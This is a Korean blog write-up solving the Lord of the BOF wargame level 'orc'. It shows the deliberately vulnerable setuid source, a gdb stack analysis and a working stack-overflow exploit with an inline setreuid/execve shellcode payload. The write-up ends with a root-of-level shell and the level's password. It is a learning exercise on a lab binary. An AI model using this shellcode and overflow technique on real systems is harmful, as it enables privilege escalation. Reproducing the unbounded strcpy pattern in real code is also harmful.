

[LOB] goblin

시작

안녕하세요 :D

축구장 갔다가.. 야구장 갔다가.. PC방 갔다가.. 어느 새 내일 복귀네요 ㅎㅎ!!

오늘 챔스 보기 전까지 LOB로 달려야겠습니다ㅠ

쉬운 문제는 롸업 쓰기 너무 귀찮지만!! 안 쓰면 허전하잖아요!! 빨리 지나가죠

Write UP

[goblin@localhost goblin]$ ll 
total 20 
-rwsr-sr-x    1 orc      orc         12567 Feb 26  2010 orc 
-rw-r--r--    1 root     root          505 Mar 29  2010 orc.c 
[goblin@localhost goblin]$ 
[goblin@localhost goblin]$ cat orc.c 
/* 
        The Lord of the BOF : The Fellowship of the BOF 
        - orc 
        - egghunter 
*/ 

#include  
#include  

extern char **environ; 

/*
 * Entry point of the challenge binary (installed setuid "orc", see the
 * ls output above). It copies the caller-controlled string argv[1] into a
 * 40-byte stack buffer with strcpy(), so the amount written is bounded
 * only by the length of argv[1]. Return value: implicit int (K&R style);
 * the two error paths call exit(0), the normal path falls off the end.
 */
main(int argc, char *argv[]) 
{ 
        char buffer[40];        /* overflow target of the strcpy() below */
        int i; 

        /* Refuse to run without an argument. */
        if(argc < 2){ 
                printf("argv error\n"); 
                exit(0); 
        } 

        // egghunter 
        /* Zero the contents of every environment string in place, so data
           staged in environment variables is wiped before the copy. Only
           the string bodies are cleared; the environ pointer table stays,
           and argv is not touched at all. */
        for(i=0; environ[i]; i++) 
                memset(environ[i], 0, strlen(environ[i])); 

        /* Require byte 47 of argv[1] to be 0xbf, i.e. the most significant
           byte of a stack address in this 32-bit layout (the gdb dump below
           shows the stack at 0xbffff...). Note this indexes argv[1][47]
           without first checking that argv[1] is at least 48 bytes long. */
        if(argv[1][47] != '\xbf') 
        { 
                printf("stack is still your friend.\n"); 
                exit(0); 
        } 

        /* Unbounded copy: strcpy() stops only at argv[1]'s terminating NUL.
           buffer sits at ebp-40 (see the disassembly), so anything past 40
           bytes overwrites the saved ebp and then the return address used
           by leave/ret. A length check against sizeof(buffer), or
           strncpy()/snprintf() with that bound, would close this. */
        strcpy(buffer, argv[1]); 
        printf("%s\n", buffer); 
}

memset 호출에 의해 모든 환경변수의 내용이 0으로 초기화되네요. 즉 환경변수에 쉘코드를 넣는 방식은 쓸 수 없습니다.

그런데 우리는 환경변수에 쉘코드를 저장하지 않습니다. RET 뒤에 이어지는 스택 공간에 배치할 뿐입니다.

가볍게 무시하고 저번 문제와 비슷한 페이로드를 작성해봅시다.

[goblin@localhost goblin]$ gdb -q /tmp/orc 
(gdb) set disassembly-flavor intel 
(gdb) disas main 
Dump of assembler code for function main: 
0x8048500 :       push   %ebp 
0x8048501 <main+1>:     mov    %ebp,%esp 
0x8048503 <main+3>:     sub    %esp,44 
0x8048506 <main+6>:     cmp    DWORD PTR [%ebp+8],1 
0x804850a <main+10>:    jg     0x8048523 <main+35> 
0x804850c <main+12>:    push   0x8048630 
0x8048511 <main+17>:    call   0x8048410  
0x8048516 <main+22>:    add    %esp,4 
0x8048519 <main+25>:    push   0 
0x804851b <main+27>:    call   0x8048420  
0x8048520 <main+32>:    add    %esp,4 
0x8048523 <main+35>:    nop 
0x8048524 <main+36>:    mov    DWORD PTR [%ebp-44],0x0 
0x804852b <main+43>:    nop 
0x804852c <main+44>:    lea    %esi,[%esi*1] 
0x8048530 <main+48>:    mov    %eax,DWORD PTR [%ebp-44] 
0x8048533 <main+51>:    lea    %edx,[%eax*4] 
0x804853a <main+58>:    mov    %eax,%ds:0x8049750 
0x804853f <main+63>:    cmp    DWORD PTR [%eax+%edx],0 
0x8048543 <main+67>:    jne    0x8048547 <main+71> 
0x8048545 <main+69>:    jmp    0x8048587 <main+135> 
0x8048547 <main+71>:    mov    %eax,DWORD PTR [%ebp-44] 
0x804854a <main+74>:    lea    %edx,[%eax*4] 
0x8048551 <main+81>:    mov    %eax,%ds:0x8049750 
0x8048556 <main+86>:    mov    %edx,DWORD PTR [%eax+%edx] 
0x8048559 <main+89>:    push   %edx 
0x804855a <main+90>:    call   0x80483f0  
0x804855f <main+95>:    add    %esp,4 
0x8048562 <main+98>:    mov    %eax,%eax 
0x8048564 <main+100>:   push   %eax 
0x8048565 <main+101>:   push   0 
0x8048567 <main+103>:   mov    %eax,DWORD PTR [%ebp-44] 
0x804856a <main+106>:   lea    %edx,[%eax*4] 
0x8048571 <main+113>:   mov    %eax,%ds:0x8049750 
0x8048576 <main+118>:   mov    %edx,DWORD PTR [%eax+%edx] 
0x8048579 <main+121>:   push   %edx 
0x804857a <main+122>:   call   0x8048430  
0x804857f <main+127>:   add    %esp,12 
0x8048582 <main+130>:   inc    DWORD PTR [%ebp-44] 
0x8048585 <main+133>:   jmp    0x8048530 <main+48> 
0x8048587 <main+135>:   mov    %eax,DWORD PTR [%ebp+12] 
0x804858a <main+138>:   add    %eax,4 
0x804858d <main+141>:   mov    %edx,DWORD PTR [%eax] 
0x804858f <main+143>:   add    %edx,47 
0x8048592 <main+146>:   cmp    BYTE PTR [%edx],0xbf 
0x8048595 <main+149>:   je     0x80485b0 <main+176> 
0x8048597 <main+151>:   push   0x804863c 
0x804859c <main+156>:   call   0x8048410  
0x80485a1 <main+161>:   add    %esp,4 
0x80485a4 <main+164>:   push   0 
0x80485a6 <main+166>:   call   0x8048420  
0x80485ab <main+171>:   add    %esp,4 
0x80485ae <main+174>:   mov    %esi,%esi 
---Type  to continue, or q  to quit--- 
0x80485b0 <main+176>:   mov    %eax,DWORD PTR [%ebp+12] 
0x80485b3 <main+179>:   add    %eax,4 
0x80485b6 <main+182>:   mov    %edx,DWORD PTR [%eax] 
0x80485b8 <main+184>:   push   %edx 
0x80485b9 <main+185>:   lea    %eax,[%ebp-40] 
0x80485bc <main+188>:   push   %eax 
0x80485bd <main+189>:   call   0x8048440  
0x80485c2 <main+194>:   add    %esp,8 
0x80485c5 <main+197>:   lea    %eax,[%ebp-40] 
0x80485c8 <main+200>:   push   %eax 
0x80485c9 <main+201>:   push   0x8048659 
0x80485ce <main+206>:   call   0x8048410  
0x80485d3 <main+211>:   add    %esp,8 
0x80485d6 <main+214>:   leave 
0x80485d7 <main+215>:   ret 
0x80485d8 <main+216>:   nop 
0x80485d9 <main+217>:   nop 
0x80485da <main+218>:   nop 
0x80485db <main+219>:   nop 
0x80485dc <main+220>:   nop 
0x80485dd <main+221>:   nop 
0x80485de <main+222>:   nop 
0x80485df <main+223>:   nop 
End of assembler dump. 
(gdb) b *main+194 
Breakpoint 1 at 0x80485c2 
(gdb) r `python -c 'print "A" * 44 + "BBB" + "\xbf" + "\x90" * 100 + "CCCC"'` 
Starting program: /tmp/orc `python -c 'print "A" * 44 + "BBB" + "\xbf" + "\x90" * 100 + "CCCC"'` 

Breakpoint 1, 0x80485c2 in main () 
(gdb) x/100wx $esp 
0xbffffa74:     0xbffffa80      0xbffffbf5      0x00000014      0x41414141 
0xbffffa84:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffa94:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffaa4:     0x41414141      0x41414141      0xbf424242      0x90909090 
0xbffffab4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffac4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffad4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffae4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffaf4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb04:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb14:     0x43434343      0xbffffe00      0xbffffeea      0xbffffeff 
0xbffffb24:     0xbfffff1d      0xbfffff28      0xbfffff37      0xbfffff3f 
0xbffffb34:     0xbfffff50      0xbfffff5a      0xbfffff68      0xbfffff79 
0xbffffb44:     0xbfffff87      0xbfffff92      0xbfffffa4      0x00000000 
0xbffffb54:     0x00000003      0x08048034      0x00000004      0x00000020 
0xbffffb64:     0x00000005      0x00000006      0x00000006      0x00001000 
0xbffffb74:     0x00000007      0x40000000      0x00000008      0x00000000 
0xbffffb84:     0x00000009      0x08048450      0x0000000b      0x000001f7 
0xbffffb94:     0x0000000c      0x000001f7      0x0000000d      0x000001f7 
0xbffffba4:     0x0000000e      0x000001f7      0x00000010      0x0f8bfbff 
0xbffffbb4:     0x0000000f      0xbffffbe7      0x00000000      0x00000000 
0xbffffbc4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbd4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbe4:     0x69000000      0x00363836      0x706d742f      0x63726f2f 
0xbffffbf4:     0x41414100      0x41414141      0x41414141      0x41414141 
(gdb) q 
The program is running.  Exit anyway? (y or n) y 
[goblin@localhost goblin]$ ./orc `python -c 'print "A" * 44 + "\xc4\xfa\xff\xbf" + "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'` 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒° 
                                                             ̀1▒̀ 
bash$ id 
uid=504(orc) gid=503(goblin) egid=504(orc) groups=503(goblin) 
bash$ /bin/my-pass 
euid = 504 
cantata

Exploit!!

자세한 설명은 이전 글들에 나와있으니 참고해주세요!

마무리

시간이 얼마 남지 않았습니다ㅠㅠ 다음 문제 바로 풀어보죠 :D
